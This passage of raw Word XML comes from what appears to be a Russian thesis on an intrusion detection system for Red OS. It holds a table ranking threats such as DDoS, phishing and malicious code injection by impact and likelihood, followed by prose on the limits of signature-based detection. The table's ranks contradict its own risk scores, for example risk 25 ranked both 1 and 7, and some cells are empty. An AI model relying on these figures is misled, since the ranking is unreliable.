        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F87A0C" w14:textId="77777777" w:rsidR="002E66B7" w:rsidRDefault="002E66B7" w:rsidP="002E66B7">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD54920" w14:textId="11578791" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Таблица 7 - Ранжирование угроз</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="96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410"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="892"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00C41C6A" w14:paraId="3936FE59" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="1683"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64635672"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Код угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51F83D23"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Наименование угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B4E4CDE"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Показатель негативного воздействия (1–5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45E7C2BB"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Реальность реализации (1–5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672650DB" w14:textId="51205A16"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Показатель риска</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43F8C1FE"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Ранг</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00C41C6A" w14:paraId="6BFBADC7" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="550"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DC86457"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УБИ.140</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BBE266F"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 xml:space="preserve">Угроза </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C41C6A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28D55F72"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CBB5A34"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A8042CC"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="058F7803"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00C41C6A" w14:paraId="509365BE" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="622"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3146AF51"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УБИ.175</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FC0925C"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Угроза фишинга</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19BBCEC2"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54F79B5A"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A0FB259"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0739D455"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00C41C6A" w14:paraId="0A82F5BD" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="964"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41B311F3"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УБИ.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DC46EA6"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Угроза перехвата данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43D581D7"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70E2DD09"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A468A7F"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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F3BF717"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00C41C6A" w14:paraId="6FA3CF6D" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="1027"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D1A18F8"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УБИ.186</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D3CBC9B"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Угроза внедрения вредоносного кода</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E1C7055"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="140E478C"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02DB7119"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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="378E7824"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00C41C6A" w14:paraId="40FD5111" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="1023"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A596AFA"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УБИ.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5369E5B1"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Угроза «форсированного веб-браузинга»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="209D8E4B"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5768A8AA"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="651B5E4B"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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65FD4999"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00C41C6A" w14:paraId="0918A794" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="1121"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="511BD4E3"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УБИ.153</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33C2EEE5"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Угроза ботнетов/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C41C6A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>криптоджекинга</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58538648"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17534FC0"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72273930"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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65C9C85E"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00C41C6A" w14:paraId="3018382B" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="881"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11E17BAF"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УБИ.167</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1252B4C8"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Угроза заражения через сайты</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09EE05B8"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B5E2C01"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36CAD2C5"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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E049015"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00C41C6A" w14:paraId="1069A72B" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="689"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C2F887D"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УБИ.131</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3693E619"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Угроза спуфинга</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62EF19E2"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09C0D3EA"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="458E5F32"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01E6DAEF"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41C6A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00C41C6A" w14:paraId="65A1AEAE" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="1119"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="403ED3C5"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4551AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>УБИ.221</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="454F116B"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561C88">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Угроза модификации модели машинного обучения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="055C2272"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AA22A75"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A43A96F"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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10C80CDA" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C41C6A" w:rsidRDefault="008E0171"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p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06B73EDA" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF2EB6A" w14:textId="1E7F0313" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691026">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В ходе анализа таблицы </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1E70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00691026">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно сделать вывод, что </w:t>
      </w:r>
      <w:r w:rsidRPr="00C1619A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">наиболее опасными и актуальными являются сетевые атаки типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C1619A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C1619A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (УБИ.140) и угроза внедрения вредоносного кода через сторонние ресурсы (УБИ.186). Обе угрозы проявляются в виде аномалий сетевого трафика</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00691026">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>что подтверждает актуальность разработки специализированного нейросетевого модуля для системы обнаружения вторжений на базе Ред ОС</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00807E0C" w:rsidRPr="00807E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ряд исследований в области информационной </w:t>
      </w:r>
      <w:r w:rsidR="00807E0C" w:rsidRPr="00807E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>безопасности показывает, что даже в отношении детектируемых угроз возможности сигнатурных СОВ ограничены — некоторые типы атак могут быть плохо распознаны при использовании стандартных сигнатур или вовсе обойдены за счёт модификации вредоносного трафика [</w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00807E0C" w:rsidRPr="00807E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00807E0C" w:rsidRPr="00807E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083E2085" w14:textId="22554737" w:rsidR="008E0171" w:rsidRPr="00C56222" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C56222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для проведения корректной оценки рисков в соответствии с методологией информационной безопасности была использована методика оценки угроз безопасности информации, утвержденная ФСТЭК от 05.02.2021</w:t>
      </w:r>
      <w:r w:rsidR="00191A78" w:rsidRPr="00191A78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="000C2219">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00191A78" w:rsidRPr="00191A78">
        <w:rPr>
